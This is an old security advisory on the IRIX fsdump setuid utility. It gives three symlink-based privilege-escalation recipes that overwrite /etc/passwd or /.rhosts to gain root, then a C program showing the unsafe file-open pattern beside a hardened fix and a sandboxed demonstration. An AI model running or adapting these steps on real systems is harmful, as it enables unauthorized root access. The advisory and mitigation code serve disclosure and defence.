
source: https://www.securityfocus.com/bid/355/info
A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privilege.

Variant 1:

irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /

(count to three, and hit ctrl-c)

irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd

irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted

irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -
irix#

Variant 2:

cp /etc/passwd /tmp/passwd
ln -s /etc/passwd rfd.lock
/var/rfindd/fsdump -F/tmp/rfd /
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /

Variant 3:

cd /tmp
ln -s /.rhosts fsdump.dir
/var/rfindd/fsdump -Fgimme /
ls -al /.rhosts
rm -f fsdump.dir fsdump.pag gimme
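All three variants share one root cause as far as the steps above show it: a setuid-root utility creates files at caller-chosen names (the -L log, the -F dump with its .dir/.pag companions, its lock file) while still running as root, so a symlink planted at that name (rfd.lock -> /etc/passwd, fsdump.dir -> /.rhosts) redirects the write. The program below is an added illustration of the defensive fix, not code from the advisory or from IRIX: it places the unsafe open pattern beside the hardened one (O_EXCL plus O_NOFOLLOW), adds a privilege-drop helper such a tool should call before touching any user-named path, and reproduces the redirect in a scratch directory with a constructed "victim" file standing in for /etc/passwd. The function names and the /tmp scratch layout are assumptions of this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical mitigation helper: a setuid-root utility should give up root
 * permanently before it opens any path chosen by the caller. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0)
        return -1;
    if (setuid(getuid()) != 0)
        return -1;
    /* Confirm the drop took effect rather than trusting the return codes. */
    return (geteuid() == getuid() && getegid() == getgid()) ? 0 : -1;
}

/* The unsafe pattern the fsdump steps exploit: create a caller-named output
 * file while privileged, with flags that happily follow a planted symlink. */
int create_output_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened form: O_EXCL refuses any existing entry (a symlink included) and
 * O_NOFOLLOW refuses to traverse a link at the final component, so the write
 * cannot be steered onto /etc/passwd, /.rhosts or any other target. */
int create_output_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
}

/* Returns 1 if fd refers to the same inode as the file at path, else 0. */
static int same_file(int fd, const char *path)
{
    struct stat a, b;
    if (fstat(fd, &a) != 0 || stat(path, &b) != 0)
        return 0;
    return a.st_dev == b.st_dev && a.st_ino == b.st_ino;
}

/* Constructed scenario: "victim" stands in for /etc/passwd and output.log is a
 * symlink to it, mirroring Variant 2's rfd.lock. Returns 1 when the unsafe
 * open was redirected onto the victim AND the safe open refused, else 0. */
int demo_symlink_redirect(void)
{
    char dir[] = "/tmp/fsdump-demo-XXXXXX";
    char victim[PATH_MAX], lnk[PATH_MAX];
    int vfd, ufd, sfd, redirected = 0, refused = 0;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/output.log", dir);

    vfd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (vfd >= 0) {
        (void)write(vfd, "victim contents\n", 16);
        close(vfd);
        if (symlink(victim, lnk) == 0) {
            ufd = create_output_unsafe(lnk);
            if (ufd >= 0) {
                redirected = same_file(ufd, victim); /* opened the link target */
                close(ufd);
            }
            sfd = create_output_safe(lnk);
            if (sfd < 0)
                refused = (errno == EEXIST || errno == ELOOP);
            else
                close(sfd);
        }
    }
    unlink(lnk);
    unlink(victim);
    rmdir(dir);
    return redirected && refused;
}

int main(void)
{
    printf("unsafe open followed the symlink and safe open refused: %s\n",
           demo_symlink_redirect() ? "yes" : "no");
    return 0;
}
```

The same check applies to the dbm companions a tool like fsdump writes next to its output (the .dir and .pag names of Variant 3): every derived path must be created with the exclusive, non-following flags, and the chown-to-caller that Variant 1 reveals (/etc/passwd ending up owned by the invoking user) becomes unnecessary once the file is created after privileges are dropped.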